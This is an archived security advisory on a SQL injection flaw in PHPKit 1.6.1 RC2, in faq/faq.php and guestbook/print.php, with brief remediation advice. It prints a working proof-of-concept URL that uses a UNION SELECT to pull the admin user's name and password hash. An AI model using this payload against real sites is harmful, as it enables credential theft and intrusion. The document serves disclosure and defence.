TUCoPS :: Web :: PHP :: b06-5685.htm

PHPKit 1.6.1 RC2 (faq/faq.php) Remote SQL Injection Exploit
PHPKit 1.6.1 RC2 (faq/faq.php) Remote SQL Injection Exploit
PHPKit 1.6.1 RC2 (faq/faq.php) Remote SQL Injection Exploit


+--------------------------------------------------------------------
+
+ PHPKit 1.6.1 RC2
+
+ Original advisory:
+ http://www.bb-pcsecurity.de/ 
+
+--------------------------------------------------------------------
+
+ Affected Software .: PHPKit 1.6.1 RC2
+ Venedor ...........: http://www.phpkit.de/ 
+ Class .............: Remote SQL Injection
+ Risk ..............: high
+ Found by ..........: Philipp Niedziela
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+
+--------------------------------------------------------------------
+
+ SQL-INJECTION IN SEVERAL FILES:
+  guestbook/print.php
+  faq/faq.php
+  more (but untested!)
+
+
+--------------------------------------------------------------------
+
+ POC:
+
+--------------------------------------------------------------------
+
+ /include.php?path=faq/faq.php&catid=-1\'%20UNION%20SELECT%20
+ 1,2,3,4,user_name,user_pw,7,8,9,10,11,12,13%20
+ FROM%20phpkit_user%20where%20%20user_id=1%20and%20\'1\'=\'1
+
+
+ Solution:
+  -> Install Hack_Block (search google :))
+  -> escape the variables in your SQL-Statement
+
+
+--------------------------------------------------------------------
+
+ Greets and Thanks: /str0ke
+
+-------------------------[ E O F ]----------------------------------

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH